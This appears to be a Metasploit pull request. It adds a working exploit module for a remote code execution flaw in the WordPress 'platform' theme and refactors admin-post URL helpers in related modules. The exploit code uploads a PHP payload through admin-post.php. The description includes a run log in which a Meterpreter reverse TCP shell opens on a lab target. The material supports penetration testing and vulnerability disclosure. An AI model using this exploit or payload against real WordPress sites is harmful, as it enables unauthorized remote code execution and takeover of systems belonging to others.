### PR TITLE
add wordpress platform theme rce

### DIFF
--- a/lib/msf/http/wordpress/uris.rb
+++ b/lib/msf/http/wordpress/uris.rb
@@ -77,8 +77,16 @@ module Msf::HTTP::Wordpress::URIs
   #
   # @return [String] Wordpress Admin Ajax URL
   def wordpress_url_admin_ajax
-    normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')
+    normalize_uri(wordpress_url_backend, 'admin-ajax.php')
   end
+
+  # Returns the Wordpress Admin Posts URL
+  #
+  # @return [String] Wordpress Admin Post URL
+  def wordpress_url_admin_post
+    normalize_uri(wordpress_url_backend, 'admin-post.php')
+  end
+
 
   # Returns the Wordpress wp-content dir URL
   #

--- a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb
+++ b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def get_table_prefix
     res = send_request_cgi({
-      'uri'       => normalize_uri(wordpress_url_backend, 'admin-post.php'),
+      'uri'       => wordpress_url_admin_post,
       'method'    => 'POST',
       'vars_post' => {
         'ccf_export' => "1"
@@ -81,10 +81,9 @@ class Metasploit3 < Msf::Auxiliary
     post_data = data.to_s
 
     print_status("#{peer} - Inserting user #{username} with password #{password}")
-    uri = normalize_uri(wordpress_url_backend, 'admin-post.php')
     res = send_request_cgi(
       'method'   => 'POST',
-      'uri'      => uri,
+      'uri'      => wordpress_url_admin_post,
       'ctype'    => "multipart/form-data; boundary=#{data.bound}",
       'data'     => post_data
     )

--- a/modules/exploits/unix/webapp/wp_platform_exec.rb
+++ b/modules/exploits/unix/webapp/wp_platform_exec.rb
@@ -1,0 +1,58 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'           => 'Remote Code Execution in Wordpress Platform Theme',
+      'Description'    => %q{
+          The Wordpress Theme "platform" contains a remote code execution vulnerability
+          through an unchecked admin_init call. The theme includes the uploaded file
+          from it's temp filename with php's include function.
+      },
+      'Author'         =>
+        [
+          'Marc-Alexandre Montpas', # initial discovery
+          'Christian Mehlmauer'     # metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html'],
+          ['WPVDB', '7762']
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['platform < 1.4.4, platform pro < 1.6.2', {}]],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 21 2015'))
+  end
+
+  def exploit
+    filename = "Settings_#{rand_text_alpha(5)}.php"
+
+    data = Rex::MIME::Message.new
+    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
+    data.add_part('settings', nil, nil, 'form-data; name="settings_upload"')
+    data.add_part('pagelines', nil, nil, 'form-data; name="page"')
+    post_data = data.to_s
+
+    print_status("#{peer} - Uploading payload")
+    res = send_request_cgi(
+      'method'   => 'POST',
+      'uri'      => wordpress_url_admin_post,
+      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
+      'data'     => post_data
+    )
+  end
+end

--- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
@@ -78,8 +78,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
     zip_content = create_zip_file(theme_name, payload_name)
 
-    uri = normalize_uri(wordpress_url_backend, 'admin-post.php')
-
     data = Rex::MIME::Message.new
     data.add_part(zip_content, 'application/x-zip-compressed', 'binary', "form-data; name=\"my-theme\"; filename=\"#{rand_text_alpha(5)}.zip\"")
     data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"')
@@ -94,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("#{peer} - Uploading payload to #{payload_uri}")
     res = send_request_cgi(
       'method'   => 'POST',
-      'uri'      => uri,
+      'uri'      => wordpress_url_admin_post,
       'ctype'    => "multipart/form-data; boundary=#{data.bound}",
       'vars_get' => { 'page' => 'wysija_campaigns', 'action' => 'themes' },
       'data'     => post_data


### PR DESCRIPTION
- Install Wordpress
- Upload Theme https://wordpress.org/themes/download/platform.1.4.3.zip
- Activate Theme
- run exploit

PS: Theme does not contain a readme file so there is no check method implemented

```
Module options (exploit/unix/webapp/wp_platform_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      10.211.55.39     yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.211.55.2      yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   platform < 1.4.4, platform pro < 1.6.2


msf exploit(wp_platform_exec) > run

[*] Started reverse handler on 10.211.55.2:4444
[*] 10.211.55.39:80 - Uploading payload
[*] Sending stage (40499 bytes) to 10.211.55.39
[*] Meterpreter session 2 opened (10.211.55.2:4444 -> 10.211.55.39:47757) at 2015-01-31 22:01:19 +0100

meterpreter > sysinfo
Computer    : wordpress
OS          : Linux wordpress 3.13.0-37-generic #64-Ubuntu SMP Mon Sep 22 21:28:38 UTC 2014 x86_64
Meterpreter : php/php
meterpreter >
```
